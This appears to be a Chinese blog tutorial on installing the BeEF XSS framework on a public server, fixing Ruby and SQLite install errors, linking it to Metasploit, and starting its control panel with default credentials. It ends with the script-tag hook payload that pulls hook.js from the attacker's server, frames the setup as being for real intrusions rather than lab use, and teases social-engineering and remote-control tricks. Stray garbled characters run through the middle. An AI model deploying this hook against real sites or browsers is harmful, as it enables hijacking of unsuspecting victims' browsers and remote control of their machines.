beef xss framework 之前就玩過,之前也總結過,但是當時覺得這玩意太簡單了,安裝的幾個問題也不大就沒有寫教程,指到今天又要裝beef xss的時候我翻了下我以前記的筆記,懵逼了:

beef xss

筆記記的過于簡單,直接提醒自己看README,現在連下載都要百度,安裝的時候報的錯也要重新百度,所以這次干脆總結下,也算是給自己的備忘以下。

另外,可能很多朋友又要說,這玩意kali或者bt直接自帶,哪還需要安裝教程。

這類人我就不明白了,真實xss滲透的時候難道你還是內網?難道還得路由器轉發?外網服務器難道不是必須品?

很多滲透組件,metasploit,nessus,beef等等組件不都得手動裝嗎,難道天天抱個本地kali自己日自己嗎。

廢話少說,進入正題。以下linux命令就不細說了,如果是debian系統,如kali,則用apt-get install安裝,如有其他疑問的請自行百度。

beef xss framework下載

git clone https://github.com/beefproject/beef

安裝及問題

gem install bundler

第一個錯

-bash: gem: command not found

解決方法:yum install gem

第二個錯

/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/bin/ruby
extconf.rb
mkmf.rb can't find header files for ruby at
/System/Library/Frameworks/Ruby.framework/Versions/1.8/usr/lib/ruby/ruby.h

解決方法:yum install ruby-devel

bundle install

第三個錯

An error occurred while installing do_sqlite3 (0.10.17), and Bundler cannot continue.
Make sure that `gem install do_sqlite3 -v '0.10.17'` succeeds before bundling.
提示安裝sqlite3錯誤,
解決方法:
需要手動下載sqlite源碼包編譯安裝。
直接下載地址:http://www.sqlite.org/2016/sqlite-autoconf-3140200.tar.gz
下載好后,直接三部曲:./configure&&make&&make install
裝好sqllite3后再重新:
bundle install

沒有報錯則安裝成功

鏈接msf

打開config.yaml這個文件,我們需要把里面關于metasploit的那一項開啟如下圖:6 r??c% w3 z” Z6 L4 Q” q
3.png?” E” m* m1 N) h4 r% ]??l
將metasploit的enable的項改成true就可以了,然后保存退出。下一步我們需要進入beEF下面的extensions/metasploit目錄。如下圖:! R2 Y0 I, }8 X7 E$ Z6 R1 K
4.png?
打開這個config.yaml文件,并把這幾個地方修改下:) ~. G??Z2 p’ C, @
5.png?
這個地方ip改為你本機ip,不要用127.0.0.1。下面的路徑為metasploit的路徑,然后保存。??]* q3 w5 _) i6 _7 M
然后把metasploit的服務開啟,在命令行下用msfconsole把控制臺打開,接著加載beEF。所用命令為:“load msgrpc ServerHost=192.169.60.19 Pass=abc123”” M, L/ J0 M” L1 m0 Y/ r
6.png

啟動beef

啟動很簡單,直接./beef就可以,

如果后臺運行可以:nohup ./beef &

使用方法

http://*****:3000/ui/panel

默認密碼:beef ?beef

?如需修改密碼:beef xss framework修改默認登錄密碼

腳本地址:<script src=http://*****:3000/hook.js></script>

到這里不用再教了吧

beef xss

 

有機會分享幾個人使用的beef 猥瑣社工+遠控套路,真是有點舍不得啊~

 

 

 

您的支持將鼓勵我們繼續創作!

[微信] 掃描二維碼打賞

[支付寶] 掃描二維碼打賞